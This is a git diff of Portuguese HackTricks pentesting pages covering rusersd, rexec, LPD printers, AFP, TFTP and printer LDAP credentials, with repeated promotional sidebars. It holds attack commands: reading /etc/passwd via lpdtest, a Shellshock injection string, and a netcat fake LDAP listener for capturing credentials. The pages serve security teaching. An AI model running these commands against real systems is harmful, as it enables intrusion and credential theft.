Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-24 05:33:33 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['network-services-pentesting/1026-pentesting-rusersd.md', 'n

Browse source
This commit is contained in:
Translator 2024-01-12 08:15:16 +00:00
parent 79b3de7e72
commit 429d1f73c2
12 changed files with 500 additions and 295 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

35
network-services-pentesting/1026-pentesting-rusersd.md
View file

@ -1,6 +1,21 @@
# Informação Básica
<details>
Este protocolo fornecerá os nomes de usuário do host. Você pode ser capaz de encontrar esses serviços listados pelo serviço de mapeamento de porta como este:
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
# Informações Básicas
Este protocolo fornecerá os nomes de usuário do host. Você pode ser capaz de encontrar estes serviços listados pelo serviço de mapeamento de portas assim:
![](<../.gitbook/assets/image (231).png>)
@ -15,16 +30,14 @@ katykat potatohead:ttyp5 Sep 1 09:35 14
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo do** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo do [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

38
network-services-pentesting/512-pentesting-rexec.md
View file

@ -1,8 +1,24 @@
## Informação Básica
# 512 - Pentesting Rexec
É um serviço que **permite executar um comando dentro de um host** se você conhece as **credenciais** válidas (nome de usuário e senha).
<details>
**Porta padrão:** 512
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## Informações Básicas
É um serviço que **permite executar um comando dentro de um host** se você conhece **credenciais** válidas (nome de usuário e senha).
**Porta Padrão:** 512
```
PORT STATE SERVICE
512/tcp open exec
@ -11,16 +27,14 @@ PORT STATE SERVICE
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

38
network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md
View file

@ -1,24 +1,22 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
O protocolo Line Printer Daemon (LPD) foi originalmente introduzido no Berkeley Unix nos anos 80 (posteriormente especificado pelo RFC1179).\
O daemon é executado na porta 515/tcp e pode ser acessado usando o comando `lpr`. Para imprimir, o cliente envia um **arquivo de controle** definindo o trabalho/nome de usuário e um **arquivo de dados** contendo os dados reais a serem impressos. O **tipo de entrada** do arquivo de dados pode ser definido no arquivo de controle escolhendo entre **vários formatos de arquivo**. No entanto, cabe à implementação do LPD como lidar com os dados de impressão. Uma implementação popular do LPD para sistemas operacionais semelhantes ao Unix é o LPRng. O LPD pode ser usado como um transportador para implantar trabalhos de impressão maliciosos **PostScript** ou **PJL**.
O daemon é executado na porta 515/tcp e pode ser acessado usando o comando `lpr`. Para imprimir, o cliente envia um **arquivo de controle** definindo o trabalho/usuário e um **arquivo de dados** contendo os dados reais a serem impressos. O **tipo de entrada** do arquivo de dados pode ser definido no arquivo de controle escolhendo entre **vários formatos de arquivo**. No entanto, cabe à implementação do LPD como realmente lidar com os dados de impressão. Uma implementação popular do LPD para sistemas operacionais semelhantes ao Unix é o LPRng. O LPD pode ser usado como um meio para implantar **trabalhos de impressão maliciosos em PostScript** ou **PJL**.
As ferramentas `lpdprint` e `lpdtest` estão incluídas no [**PRET**](https://github.com/RUB-NDS/PRET)**.** Eles são uma maneira minimalista de imprimir dados diretamente em uma impressora capaz de LPD ou baixar/enviar/excluir arquivos e muito mais:
As ferramentas `lpdprint` e `lpdtest` estão incluídas no [**PRET**](https://github.com/RUB-NDS/PRET)**.** Elas são uma maneira minimalista de imprimir dados diretamente em uma impressora compatível com LPD ou baixar/upload/excluir arquivos e mais:
```
lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
@ -27,7 +25,7 @@ lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local
```
Se você quer aprender mais sobre **hacking de impressoras, leia esta página**.
Se você quer aprender mais sobre [**hackear impressoras leia esta página**](pentesting-printers/).
# Shodan
@ -36,16 +34,14 @@ Se você quer aprender mais sobre **hacking de impressoras, leia esta página**.
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

44
network-services-pentesting/584-pentesting-afp.md
View file

@ -1,6 +1,22 @@
# 548 - Pentesting Apple Filing Protocol (AFP)
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
</details>
## Informações Básicas
O **Protocolo de Compartilhamento de Arquivos da Apple** (**AFP**), anteriormente conhecido como Protocolo de Compartilhamento de Arquivos AppleTalk, é um protocolo de rede proprietário e faz parte do **Serviço de Arquivos da Apple** (**AFS**), que oferece serviços de arquivos para macOS e o sistema operacional clássico do Mac. No macOS, o AFP é um dos vários serviços de arquivos suportados. O AFP atualmente suporta nomes de arquivos Unicode, permissões POSIX e de lista de controle de acesso, forks de recursos, atributos estendidos nomeados e bloqueio avançado de arquivos. No Mac OS 9 e anteriores, o AFP era o protocolo principal para serviços de arquivos.
O **Apple Filing Protocol** (**AFP**), anteriormente conhecido como AppleTalk Filing Protocol, é um protocolo de rede proprietário e parte do **Apple File Service** (**AFS**), que oferece serviços de arquivos para macOS e o clássico Mac OS. No macOS, o AFP é um dos vários serviços de arquivos suportados. O AFP atualmente suporta nomes de arquivos Unicode, permissões de lista de controle de acesso e POSIX, forks de recursos, atributos estendidos nomeados e bloqueio avançado de arquivos. No Mac OS 9 e versões anteriores, o AFP era o protocolo primário para serviços de arquivos.
**Porta padrão:** 548
```
@ -12,27 +28,25 @@ PORT STATE SERVICE
msf> use auxiliary/scanner/afp/afp_server_info
nmap -sV --script "afp-* and not dos and not brute" -p <PORT> <IP>
```
| **Nome** | **Descrição** |
| -------------- | ------------------------------------------------------------------------------------------------------------------------------------------- |
| afp-ls | Lista os volumes e arquivos AFP disponíveis |
| **Nome** | **Descrição** |
| -------------- | ------------------------------------------------------------------------------------------------------------------------------------------ |
| afp-ls | Lista volumes e arquivos AFP disponíveis |
| afp-path-vuln | Lista todos os volumes e arquivos AFP[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch15.html#ch15fn48) |
| afp-serverinfo | Exibe informações do servidor AFP |
| afp-showmount | Lista os compartilhamentos AFP disponíveis e seus respectivos ACLs |
| afp-serverinfo | Exibe informações do servidor AFP |
| afp-showmount | Lista compartilhamentos AFP disponíveis e respectivas ACLs |
### [**Força Bruta**](../generic-methodologies-and-resources/brute-force.md#afp)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking em AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

48
network-services-pentesting/69-udp-tftp.md
View file

@ -1,23 +1,40 @@
# Informação Básica
```markdown
<details>
O TFTP usa a porta UDP 69 e **não requer autenticação** - os clientes lêem e gravam nos servidores usando o formato de datagrama descrito no RFC 1350. Devido às deficiências do protocolo (principalmente a falta de autenticação e segurança de transporte), é incomum encontrar servidores na Internet pública. No entanto, em grandes redes internas, o TFTP é usado para servir arquivos de configuração e imagens ROM para telefones VoIP e outros dispositivos.
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
**TODO**: Fornecer informações sobre o que é um Bittorrent-tracker (Shodan identifica essa porta com esse nome). POR FAVOR, ME AVISE SE VOCÊ TIVER ALGUMA INFORMAÇÃO SOBRE ISSO NO [**grupo telegram do HackTricks**](https://t.me/peass) (ou em uma issue do github em [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)).
Outras formas de apoiar o HackTricks:
**Porta padrão:** 69/UDP
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
# Informações Básicas
**TFTP** usa a porta UDP 69 e **não requer autenticação**—clientes leem e escrevem em servidores usando o formato de datagrama descrito no RFC 1350. Devido a deficiências no protocolo (principalmente a falta de autenticação e segurança no transporte), é incomum encontrar servidores na Internet pública. No entanto, dentro de grandes redes internas, o TFTP é usado para fornecer arquivos de configuração e imagens de ROM para aparelhos VoIP e outros dispositivos.
**TODO**: Fornecer informações sobre o que é um Bittorrent-tracker (Shodan identifica essa porta com esse nome). POR FAVOR, INFORME-ME SE VOCÊ TIVER ALGUMA INFORMAÇÃO SOBRE ISSO NO [**grupo do telegram HackTricks**](https://t.me/peass) (ou em uma issue no github em [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)).
**Porta Padrão:** 69/UDP
```
```
PORT STATE SERVICE REASON
69/udp open tftp script-set
```
# Enumeração
O TFTP não fornece listagem de diretórios, então o script `tftp-enum` do `nmap` tentará forçar caminhos padrão.
O TFTP não oferece listagem de diretórios, então o script `tftp-enum` do `nmap` tentará força bruta em caminhos padrões.
```bash
nmap -n -Pn -sU -p69 -sV --script tftp-enum <IP>
```
## Download/Upload
Você pode usar o Metasploit ou Python para verificar se é possível baixar/enviar arquivos:
Você pode usar o Metasploit ou Python para verificar se você pode baixar/enviar arquivos:
```bash
msf5> auxiliary/admin/tftp/tftp_transfer_util
```
@ -30,20 +47,19 @@ client.upload("filename to upload", "/local/path/file", timeout=5)
```
## Shodan
* `porta:69`
* `port:69`
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

122
windows-hardening/active-directory-methodology/ad-information-in-printers.md
View file

@ -1,59 +1,75 @@
Existem vários blogs na internet que destacam os perigos de deixar as impressoras configuradas com o LDAP com credenciais de login padrão/fracas. Isso ocorre porque um invasor pode enganar a impressora para autenticar-se contra um servidor LDAP falso (tipicamente um `nc -vv -l -p 444` é suficiente) e capturar as credenciais da impressora em texto claro.
<details>
Além disso, várias impressoras contêm logs com nomes de usuários ou até mesmo podem ser capazes de baixar todos os nomes de usuários do Controlador de Domínio.
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Todas essas informações sensíveis e a falta comum de segurança tornam as impressoras muito interessantes para os invasores.
Outras formas de apoiar o HackTricks:
Alguns blogs sobre o assunto:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Participe do grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou do grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
</details>
Existem vários blogs na Internet que **destacam os perigos de deixar impressoras configuradas com LDAP com credenciais de logon padrão/fracas**.\
Isso ocorre porque um atacante poderia **enganar a impressora para se autenticar contra um servidor LDAP falso** (tipicamente um `nc -vv -l -p 444` é suficiente) e capturar as **credenciais da impressora em texto claro**.
